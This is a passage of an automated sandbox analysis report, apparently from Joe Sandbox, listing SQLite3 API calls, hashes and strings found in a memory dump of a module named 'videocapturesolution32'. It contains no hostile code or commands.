                                                          • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                            • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                          • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                            • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                          • sqlite3_reset.SQLITE3 ref: 609675B7
                                                          • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                          • sqlite3_step.SQLITE3 ref: 6096764C
                                                          • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                          • sqlite3_reset.SQLITE3 ref: 6096768B
                                                          • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                            • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                          • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                          • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                          • sqlite3_step.SQLITE3 ref: 609690E6
                                                          • sqlite3_reset.SQLITE3 ref: 609690F1
                                                          • sqlite3_free.SQLITE3 ref: 60969102
                                                          • sqlite3_free.SQLITE3 ref: 6096910D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                          • String ID: $d
                                                          • API String ID: 2451604321-2084297493
                                                          • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                          • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                          • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                          • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                          APIs
                                                          • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                          • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                          • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                          • sqlite3_step.SQLITE3 ref: 6096A969
                                                          • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                          • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                            • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                            • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                            • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                          • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                          • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                          • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                          • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                          • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                          • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                          • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                          • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                          • String ID: optimize
                                                          • API String ID: 1540667495-3797040228
                                                          • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                          • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                          • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                          • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                          APIs
                                                          • sqlite3_finalize.SQLITE3 ref: 60966178
                                                          • sqlite3_free.SQLITE3 ref: 60966183
                                                          • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                          • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                          • sqlite3_value_text.SQLITE3 ref: 60966236
                                                          • sqlite3_value_int.SQLITE3 ref: 60966274
                                                          • memcmp.MSVCRT ref: 6096639E
                                                            • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                            • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                          • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                          • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                            • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                            • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                          • String ID: ASC$DESC$x
                                                          • API String ID: 4082667235-1162196452
                                                          • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                          • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                          • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                          • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096882B
                                                          • sqlite3_bind_int.SQLITE3 ref: 60968842
                                                          • sqlite3_step.SQLITE3 ref: 6096884D
                                                          • sqlite3_reset.SQLITE3 ref: 60968858
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968907
                                                          • sqlite3_bind_int.SQLITE3 ref: 60968924
                                                          • sqlite3_step.SQLITE3 ref: 6096892F
                                                          • sqlite3_column_blob.SQLITE3 ref: 60968947
                                                          • sqlite3_column_bytes.SQLITE3 ref: 6096895C
                                                          • sqlite3_column_int64.SQLITE3 ref: 60968975
                                                          • sqlite3_reset.SQLITE3 ref: 609689B0
                                                            • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                            • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                            • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                            • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                            • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                          • sqlite3_free.SQLITE3 ref: 60968A68
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968B00
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968B2D
                                                          • sqlite3_step.SQLITE3 ref: 60968B38
                                                          • sqlite3_reset.SQLITE3 ref: 60968B43
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968B9F
                                                          • sqlite3_bind_blob.SQLITE3 ref: 60968BC8
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968BEF
                                                          • sqlite3_bind_int.SQLITE3 ref: 60968C0C
                                                          • sqlite3_step.SQLITE3 ref: 60968C17
                                                          • sqlite3_reset.SQLITE3 ref: 60968C22
                                                          • sqlite3_free.SQLITE3 ref: 60968C2F
                                                          • sqlite3_free.SQLITE3 ref: 60968C3A
                                                            • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164E9
                                                            • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164F4
                                                            • Part of subcall function 6095F772: sqlite3_bind_int64.SQLITE3 ref: 6095F7AC
                                                            • Part of subcall function 6095F772: sqlite3_bind_blob.SQLITE3 ref: 6095F7D5
                                                            • Part of subcall function 6095F772: sqlite3_step.SQLITE3 ref: 6095F7E0
                                                            • Part of subcall function 6095F772: sqlite3_reset.SQLITE3 ref: 6095F7EB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64$sqlite3_free$sqlite3_resetsqlite3_step$sqlite3_bind_int$sqlite3_bind_blob$sqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_column_blobsqlite3_column_bytessqlite3_column_int64sqlite3_malloc
                                                          • String ID:
                                                          • API String ID: 2526640242-0
                                                          • Opcode ID: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                          • Instruction ID: ecb2fadc30329ad4410b738d56806f6ecd0ac298638076f7c65242d8805d2ed1
                                                          • Opcode Fuzzy Hash: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                          • Instruction Fuzzy Hash: A0D1C2B4A153189FDB14DF68C884B8EBBF2BFA9304F118599E888A7344E774D985CF41
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                          • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                          • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                            • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                            • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                            • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                            • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                          • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                          • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                          • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                          • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                          • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                          • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                          • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                          • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                            • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                          • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                          • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                          • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                          • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                          • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                          • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                          • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                          • String ID:
                                                          • API String ID: 961572588-0
                                                          • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                          • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                          • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                          • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                          • String ID: 2$foreign key$indexed
                                                          • API String ID: 4126863092-702264400
                                                          • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                          • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                          • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                          • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                          • sqlite3_step.SQLITE3 ref: 6094A73C
                                                          • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                          • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                          • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                          • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                          • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 2794791986-0
                                                          • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                          • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                          • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                          • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_stricmp
                                                          • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                          • API String ID: 912767213-1308749736
                                                          • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                          • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                          • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                          • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                          • sqlite3_step.SQLITE3 ref: 6094B496
                                                          • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                          • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                          • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                            • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                          • String ID:
                                                          • API String ID: 4082478743-0
                                                          • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                          • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                          • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                          • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                          • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID: BINARY$INTEGER
                                                          • API String ID: 317512412-1676293250
                                                          • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                          • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                          • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                          • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                          • sqlite3_step.SQLITE3 ref: 6094B590
                                                          • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                          • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                          • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 2802900177-0
                                                          • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                          • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                          • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                          • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                            • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                            • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                            • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
